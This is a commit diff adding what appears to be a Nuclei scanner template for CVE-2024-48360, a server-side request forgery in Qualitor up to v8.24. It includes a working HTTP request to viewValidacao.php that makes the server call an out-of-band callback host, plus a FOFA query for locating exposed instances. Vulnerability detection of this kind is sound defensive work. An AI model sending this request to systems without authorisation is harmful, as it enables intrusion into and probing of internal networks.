add CVE-2024-48360
parent
4913a3a7a5
commit
9bfb71dac6
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2024-48360
|
||||
|
||||
info:
|
||||
name: Qualitor <= v8.24 - Server Side Request Forgery
|
||||
author: s4e-io
|
||||
severity: high
|
||||
description: |
|
||||
Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
|
||||
reference:
|
||||
- https://github.com/OpenXP-Research/CVE-2024-48360
|
||||
- https://packetstormsecurity.com/files/182427/Qualitor-8.24-Server-Side-Request-Forgery.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-48360
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2024-48360
|
||||
cwe-id: CWE-918
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.09902
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: qualitor
|
||||
product: qualitor
|
||||
fofa-query: qualitor
|
||||
tags: cve,cve2024,ssrf,qualitor,intrusive,packetstorm
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
GET /html/ad/adformmobile/request/viewValidacao.php?url={{interactsh-url}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
Loading…
Reference in New Issue